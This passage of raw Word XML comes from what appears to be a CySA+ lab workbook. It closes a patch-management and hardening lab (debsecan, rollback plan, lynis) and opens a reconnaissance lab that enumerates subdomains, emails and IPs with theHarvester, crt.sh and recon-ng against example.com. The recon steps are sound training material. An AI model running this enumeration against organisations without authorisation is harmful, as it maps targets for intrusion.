          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>debsecan --suite=$(lsb_release -cs) --only-fixed | wc -l   # should drop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>needrestart -r l                                            # services needing restart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ssh -V; curl -s -o /dev/null -w "%{http_code}\n" http://localhost:80 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sha256sum /etc/ssh/sshd_config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>diff &lt;(sha256sum /etc/ssh/sshd_config) /tmp/preupdate.hash || echo "config changed"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If a critical service is broken, you trigger the rollback plan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Rollback plan (CySA+ "Rollback")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A real rollback strategy:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Single binary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>apt install &lt;pkg&gt;=&lt;old-version&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Config drift</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>restore from git (Lab 19 of N+ analogue) or backup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Full VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>revert to snapshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Container</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>redeploy previous image tag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cloud / AMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>swap launch template / deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Test the rollback path before prod — a rollback you have never run is a rollback that does not work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 8 — Attack surface reduction (CySA+ 2.5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A patch closes a single vuln. Reducing the attack surface eliminates entire classes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt list --installed 2&gt;/dev/null | wc -l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>systemctl list-unit-files --state=enabled --no-pager | head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>systemctl disable --now cups 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt purge -y telnet rsh-client 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Each removed package or disabled service is one less thing to patch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 9 — Re-score with lynis (CySA+ "Compensating control")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lynis audit system --quick --quiet | tail -20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>grep "Hardening index" /var/log/lynis.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Compare against the score from Lab 2. The hardening index should improve after patches + service disablement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 10 — Maintenance window playbook</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A template you can drop into Lab 25:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Notify stakeholders T-7 days, T-1 day, T-1 hour.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Snapshot / backup at T-30 min.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Apply patches during the window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run smoke tests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If any test fails → rollback within 15 min, schedule re-attempt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Send the "all clear" with the new patch level and hardening index.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>List unpatched CVEs with debsecan and prioritise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Enable Ubuntu unattended security upgrades.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run the Test → Implement → Validate → Rollback sequence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Reduce attack surface by removing unused packages and services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Use lynis to demonstrate a measurable hardening improvement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Patches break things. The CySA+ blueprint expects a staging step. Snapshot the relevant config and a smoke test:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 19 — Attack Surface Reconnaissance</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enumerate the external attack surface of a target organisation using theHarvester and recon-ng, plus free web services like crt.sh, DNSDumpster, and Shodan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will enumerate the external attack surface of a target organisation using theHarvester and recon-ng, plus free web services like crt.sh, DNSDumpster, and Shodan. This maps to CySA+ 2.5 (Attack surface management — Edge discovery, Passive discovery, Penetration testing, Bug bounty) and 2.2 (Multipurpose — Recon-ng).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; Scope: Only enumerate domains you own or have written permission for. The example uses example.com (IANA reserved).</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y theharvester recon-ng curl whois dnsutils jq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Passive discovery with theHarvester</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>theHarvester -d example.com -b duckduckgo,crtsh,bing -l 100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-b selects sources. Free, passive sources usable without keys: crtsh, duckduckgo, bing, anubis, hackertarget. Output includes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Subdomains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Email addresses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Linked IPs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Certificate-transparency search (edge discovery)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Certificate Transparency logs are the single best free subdomain discovery source — every TLS cert ever issued is public.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s 'https://crt.sh/?q=%25.example.com&amp;output=json' | jq -r '.[].name_value' | sort -u | head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Subdomains nobody links to in the navigation (vpn., admin., dev., staging.) often show up here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Recon-ng modular framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>recon-ng</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Inside the recon-ng shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[recon-ng][default] &gt; workspaces create cysa_lab19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
